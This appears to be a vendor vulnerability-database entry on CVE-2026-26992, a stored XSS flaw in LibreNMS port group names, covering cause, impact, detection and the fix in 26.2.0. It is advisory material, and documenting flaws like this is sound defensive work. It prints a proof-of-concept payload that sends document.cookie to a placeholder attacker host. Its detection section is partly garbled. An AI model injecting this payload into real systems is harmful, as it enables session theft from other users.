
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2026-26992 is a stored Cross-Site Scripting (XSS) vulnerability in LibreNMS affecting the /port-groups endpoint's name parameter. An authenticated attacker with admin privileges can inject unsanitized JavaScript into a port group name via HTTP POST, which is then persistently stored and executed in the browsers of other users who view the port group list. All LibreNMS versions prior to 26.2.0 are affected. The vulnerability was published on February 17, 2026, and carries a CVSS v3.1 score of 4.8 (Medium) and a CVSS v4.0 score of 5.1 (Medium) (GitHub Advisory, LibreNMS Advisory).
The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically the failure to sanitize HTML/JavaScript characters in the port group name field before storing and rendering it. The vulnerable template resources/views/port-group/index.blade.php directly interpolates the unsanitized port group name into the delete_pg() JavaScript function call rendered on the page, allowing injected script to execute when the Delete button is rendered for any user viewing the port group list. Exploitation requires the attacker to be authenticated with admin privileges and a victim user to view the port groups page. A public proof-of-concept payload is documented in the official advisory: 12345');var pt=new Image();pt.src='http://<attacker>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 (LibreNMS Advisory, GitHub Advisory).
Successful exploitation allows the attacker to steal session cookies from other LibreNMS users (including non-admin users), perform unauthorized actions on their behalf, redirect victims to malicious sites, or capture other sensitive information displayed in the browser session. Since LibreNMS is a network monitoring platform with visibility into infrastructure topology and device credentials, session hijacking could expose sensitive network management data. Availability is not directly impacted, but confidentiality and integrity of the affected system and subsequent systems are both rated as low impact (LibreNMS Advisory, GitHub Advisory).
A proof-of-concept exploit is publicly documented in the official GitHub Security Advisory, demonstrating cookie exfiltration via a crafted port group name. There is no evidence of active in-the-wild exploitation at this time, and no threat actor attribution has been reported. The EPSS score is approximately 0.007% (0th percentile), indicating a very low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (GitHub Advisory, LibreNMS Advisory).
12345');var pt=new Image();pt.src='http://<attacker-ip>/cookiePG'.concat(document.cookie);document.body.appendChild(pt);delete_pg(this, '12345 (replacing <attacker-ip> with an attacker-controlled server).GET /cookiePG<session_cookie_value>)./port-groups with unusually long or script-containing name parameter values; subsequent GET requests to the port groups page from multiple user accounts.');, var , document.cookie, new Image(), or <script> tags.name field of POST requests to /port-groups (LibreNMS Advisory).Upgrade LibreNMS to version 26.2.0 or later, which addresses this vulnerability by moving the port group name out of the inline JavaScript call and into a data-group-name HTML attribute, preventing script injection (commit 882fe6f). As a temporary workaround, restrict admin account access to trusted users only and monitor port group creation activity. Deploying a Web Application Firewall (WAF) with rules to filter JavaScript patterns in user inputs can provide additional defense-in-depth (GitHub Advisory, LibreNMS Release).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."